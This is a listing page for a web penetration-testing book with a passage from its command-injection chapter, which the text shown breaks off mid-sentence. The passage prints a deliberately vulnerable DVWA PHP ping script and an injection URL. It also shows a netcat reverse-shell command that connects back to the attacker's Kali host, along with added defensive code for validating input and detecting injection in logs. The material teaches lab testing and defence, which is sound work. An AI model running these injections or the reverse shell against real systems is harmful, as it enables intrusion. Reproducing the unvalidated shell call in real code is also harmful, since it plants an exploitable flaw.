Web Penetration Testing with Kali Linux
eBook - ePub

Gilberto Najera-Gutierrez, Juned Ahmed Ansari

  1. 426 pages
  2. English
  3. ePUB (available in the app)
  4. Available on iOS and Android
About the book

Build your defense against web attacks with Kali Linux, including command injection flaws, crypto implementation layers, and web application security holes

Key Features

  • Know how to set up your lab with Kali Linux
  • Discover the core concepts of web penetration testing
  • Get the tools and techniques you need with Kali Linux

Book Description

Web Penetration Testing with Kali Linux - Third Edition shows you how to set up a lab, helps you understand the nature and mechanics of attacking websites, and explains classical attacks in great depth. This edition is heavily updated for the latest Kali Linux changes and the most recent attacks. Kali Linux shines when it comes to client-side attacks and fuzzing in particular.

From the start of the book, you'll be given a thorough grounding in the concepts of hacking and penetration testing, and you'll see the tools used in Kali Linux that relate to web application hacking. You'll gain a deep understanding of classical SQL and command-injection flaws, and the many ways to exploit these flaws. Web penetration testing also needs a general overview of client-side attacks, which is rounded out by a long discussion of scripting and input validation flaws.

There is also an important chapter on cryptographic implementation flaws, where we discuss the most recent problems with cryptographic layers in the networking stack.

The importance of these attacks cannot be overstated, and defending against them is relevant to most internet users and, of course, penetration testers.

At the end of the book, you'll use an automated technique called fuzzing to identify flaws in a web application. Finally, you'll gain an understanding of web application vulnerabilities and the ways they can be exploited using the tools in Kali Linux.

What you will learn

  • Learn how to set up your lab with Kali Linux
  • Understand the core concepts of web penetration testing
  • Get to know the tools and techniques you need to use with Kali Linux
  • Identify the difference between hacking a web application and network hacking
  • Expose vulnerabilities present in web servers and their applications using server-side attacks
  • Understand the different techniques used to identify the flavor of web applications
  • See standard attacks such as exploiting cross-site request forgery and cross-site scripting flaws
  • Get an overview of the art of client-side attacks
  • Explore automated attacks such as fuzzing web applications

Who this book is for

Since this book sets out to cover a large number of tools and security fields, it can work as an introduction to practical security skills for beginners in security. In addition, web programmers and also system administrators would benefit from this rigorous introduction to web penetration testing. Basic system administration skills are necessary, and the ability to read code is a must.


Details

Year
2018
ISBN
9781788623803
Edition
3

Detecting and Exploiting Injection-Based Flaws

According to the OWASP Top 10 2013 list (https://www.owasp.org/index.php/Top_10_2013-Top_10), the most critical flaw in web applications is the injection flaw, and it has maintained its position in the 2017 list release candidate (https://www.owasp.org/index.php/Top_10-2017_Top_10). Interactive web applications take input from the user, process it, and return the output to the client. When the application is vulnerable to an injection flaw, it accepts the input from the user without proper validation, or even without any validation at all, and still processes it. This results in actions that the application did not intend to perform. The malicious input tricks the application, forcing the underlying components to perform tasks for which the application was not programmed. In other words, an injection flaw allows the attacker to control components of the application at will.
In this chapter, we will discuss the major injection flaws in today's web applications, including tools to detect and exploit them, and how to avoid being vulnerable or to fix existing flaws. These flaws include the following:
  • Command injection flaw
  • SQL injection flaw
  • XML-based injections
  • NoSQL injections
An injection flaw is used to gain access to the underlying component to which the application is sending data, to execute some task. The following table shows the most common components used by web applications that are often targeted by an injection attack when the input from the user is not sanitized by the application:
Component               Injection flaw
Operating system        Command injection
Database                SQL/NoSQL injection
Web browser / client    Cross-Site Scripting
LDAP directory          LDAP injection
XML                     XPATH / XML External Entity injection

Command injection

Web applications, which are dynamic in nature, may use scripts to invoke some functionality within the operating system on the web server to process the input received from the user. An attacker may try to get this input processed at the command line by circumventing the input validation filters implemented by the application. Command injection usually invokes commands on the same web server, but it is possible that the command can be executed on a different server, depending on the architecture of the application.
Let's take a look at a simple code snippet that is vulnerable to a command injection flaw, taken from DVWA's command injection exercise. It is a very simple script that receives an IP address and sends pings (ICMP packets) to that address:

<?php
$html = '';                                   // defined earlier in the DVWA page; initialised here so the snippet runs stand-alone
$target = $_REQUEST[ 'ip' ];                  // user-supplied value, taken as-is
$cmd = shell_exec( 'ping -c 3 ' . $target );  // concatenated straight into a shell command line
$html .= '<pre>'.$cmd.'</pre>';
echo $html;
?>
As you can see, there is no input validation before accepting the ip parameter from the user, which makes this code vulnerable to a command injection attack. To log in to DVWA, the default credentials are admin/admin.
A malicious user might use the following request to pipe in additional commands, which the application would accept without raising an exception:
http://server/page.php?ip=127.0.0.1;uname -a
The application takes the value of the user input from the client without validation and concatenates it to the ping -c 3 command in order to build the final command that is run on the web server. The response from the server is shown in the following screenshot. The version of the underlying OS is displayed along with the result of pinging the given address as the application failed to validate the user input:
The additional command injected will run using the privileges of the web server. Most web servers nowadays run with restricted privileges, but even with limited rights, the attacker can exploit and steal significant information.
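The following is an added example, not code from the book or from DVWA: the same ping handler rebuilt in Python so that the flawed pattern (concatenating the raw parameter into a shell string) sits next to two hardened forms, a strict IP validator in front of an argument vector that never touches a shell, and shell quoting as a fallback. The function names and the sample values are this example's own.

```python
"""Added example (not code from the book or from DVWA): the ping handler
rebuilt in Python to contrast shell-string concatenation with a validated
argument vector."""
import ipaddress
import shlex
import subprocess


def build_command_unsafe(target: str) -> str:
    # Mirrors the vulnerable PHP: the raw parameter is concatenated into a
    # shell command line, so ';', '|', '&&', '$(...)' and friends are parsed by
    # the shell as separate commands rather than as part of the address.
    return "ping -c 3 " + target


def validate_ip(target: str) -> str:
    """Return the canonical form of a syntactically valid IPv4/IPv6 literal.

    ipaddress.ip_address() raises ValueError for anything else, so a value
    carrying shell metacharacters never reaches a command line."""
    return str(ipaddress.ip_address(target.strip()))


def build_command_quoted(target: str) -> str:
    # Second line of defence if a shell string is unavoidable: shlex.quote()
    # (the equivalent of PHP's escapeshellarg) wraps the value so the shell
    # sees one literal argument.  Validation should still run first.
    return "ping -c 3 " + shlex.quote(target)


def build_command_safe(target: str) -> list:
    # Preferred form: validate, then pass argv directly.  With shell=False
    # (the subprocess default) there is no shell to interpret metacharacters.
    return ["ping", "-c", "3", validate_ip(target)]


def ping(target: str) -> str:
    """Run the hardened command and return its stdout (needs a ping binary)."""
    result = subprocess.run(build_command_safe(target), capture_output=True,
                            text=True, timeout=15, check=False)
    return result.stdout


if __name__ == "__main__":
    # Constructed sample inputs: one legitimate address and two injection attempts.
    for value in ("127.0.0.1", "127.0.0.1;uname -a", "127.0.0.1 | id"):
        print("unsafe shell string:", build_command_unsafe(value))
        print("quoted shell string:", build_command_quoted(value))
        try:
            print("validated argv     :", build_command_safe(value))
        except ValueError as exc:
            print("rejected           :", exc)
```

The validator is an allow-list: it accepts only what an IP literal can contain, rather than trying to enumerate dangerous characters. Passing argv as a list removes the shell from the picture entirely, which is why it is preferred over quoting; quoting is shown only because legacy code sometimes cannot give up the shell string.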
Command injection can be used to make the server download and execute malicious files by injecting wget commands, or to gain a remote shell to the server, as demonstrated in the following example.
First, set up a listener in Kali Linux. Netcat has a very simple way of doing this:
nc -lvp 12345 
Kali Linux is now set to listen for a connection on port 12345. Next, inject the following command into the vulnerable server:
nc.traditional -e /bin/bash 10.7.7.4 12345 
On some modern Linux systems, the original Netcat has been replaced by a version that doesn't include some options that may have posed a security risk, such as -e, which allows the execution of commands upon connection. These systems often include the traditional version of Netcat in a command called nc.traditional. When trying to use Netcat to gain access to a remote system, try both options.
Notice that 10.7.7.4 is the IP address of the Kali machine in the example, and 12345 is the TCP port listening for the connection. After sending the request, you should receive the connection on your Kali Linux machine and be able to issue commands in a noninteractive shell:
A noninteractive shell allows you to execute commands and see the results, but not interact with the commands nor see the error output, such as when using a text editor.
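From the defender's side, the requests shown above leave a recognisable trace: a parameter that should hold an IP address carries shell separators. The following is an added example, not code from the book, of a small detector that walks web-server access-log lines, decodes each query-string parameter (twice, to catch double-encoded payloads) and reports values containing shell metacharacters. The log lines, client addresses and timestamps are constructed for the example; the format assumed is the common Apache/nginx "combined" log, and only GET parameters are visible in such logs, since request bodies are not recorded there.

```python
"""Added example (not code from the book): flag command-injection attempts in
constructed access-log lines by looking for shell metacharacters in query
parameters."""
import re
from urllib.parse import unquote_plus, urlsplit

# Apache/nginx "combined" log format; only the client IP, timestamp and
# request target are used here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Characters and sequences a POSIX shell treats as command separators,
# redirections or substitutions.  A legitimate IP or hostname needs none of
# them, so tune this list per parameter if it is reused for free-text fields.
SHELL_META_RE = re.compile(r'[;&|`\n<>]|\$\(|\$\{')


def query_params(query: str):
    """Split a raw query string on '&' only and percent-decode name and value.

    Splitting is done by hand rather than with parse_qsl so that ';' is never
    treated as a separator (older Python versions did that), which would hide
    exactly the payload this detector is looking for."""
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        yield unquote_plus(name), unquote_plus(value)


def scan_line(line: str) -> list:
    """Return (param, decoded_value) pairs in one log line that look injected."""
    m = LOG_RE.match(line)
    if not m:
        return []
    hits = []
    for name, value in query_params(urlsplit(m.group("target")).query):
        # Decode a second time so a double-encoded ';' (%253B) is also caught.
        decoded = unquote_plus(value)
        if SHELL_META_RE.search(decoded):
            hits.append((name, decoded))
    return hits


def scan_log(lines):
    """Yield (client_ip, timestamp, param, value) for every suspicious parameter."""
    for line in lines:
        m = LOG_RE.match(line)
        for name, value in scan_line(line):
            yield (m.group("ip"), m.group("ts"), name, value)


def suspicious_clients(lines) -> list:
    """Distinct client addresses that sent at least one flagged request."""
    return sorted({hit[0] for hit in scan_log(lines)})


# Constructed sample log: 192.0.2.0/24 is documentation address space, and the
# second and third lines mirror the injection requests discussed in the text.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2018:10:00:01 +0000] "GET /page.php?ip=127.0.0.1 HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2018:10:00:05 +0000] "GET /page.php?ip=127.0.0.1%3Buname%20-a HTTP/1.1" 200 734',
    '192.0.2.10 - - [01/Jan/2018:10:00:09 +0000] "GET /page.php?ip=127.0.0.1%7Cid HTTP/1.1" 200 640',
    '192.0.2.20 - - [01/Jan/2018:10:01:00 +0000] "GET /page.php?ip=10.0.0.5 HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for client, ts, name, value in scan_log(SAMPLE_LOG):
        print(f"{ts}  {client}  {name}={value!r}")
    print("clients to investigate:", suspicious_clients(SAMPLE_LOG))
```

Because the check runs on the decoded value, percent-encoding the separators (as a browser does automatically) does not hide them. Pairing this with process monitoring on the server, where a web-server worker spawning a shell or a network client is itself the anomaly, covers the cases where the payload arrives in a POST body that never reaches the access log.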

Identifying parameters to inject data

When you are testing a web application for command injection flaws, and you have confirmed that the application is interacting with the command line of the underlying OS, the next step is to manipulate and probe the different parameters in the application and view their responses. The following parameters should be tested for command injection flaws as the application may be using one of these parameters to build a command back on the web server:
  • GET: With this method, input parameters are sent in URLs. In the example shown earlier, the input from the client was passed to the server using the GET method and was vulnerable to a command injection flaw. Any user-controlled parameter sent using the GET method request should be tested.
  • POST: In this method, the input parameters are sent in the HTTP body. Similar to the input being passed using the GET method; data taken from the end user can also be passed using the POST method in the body of the HTTP request. This could then be used by the web applic...
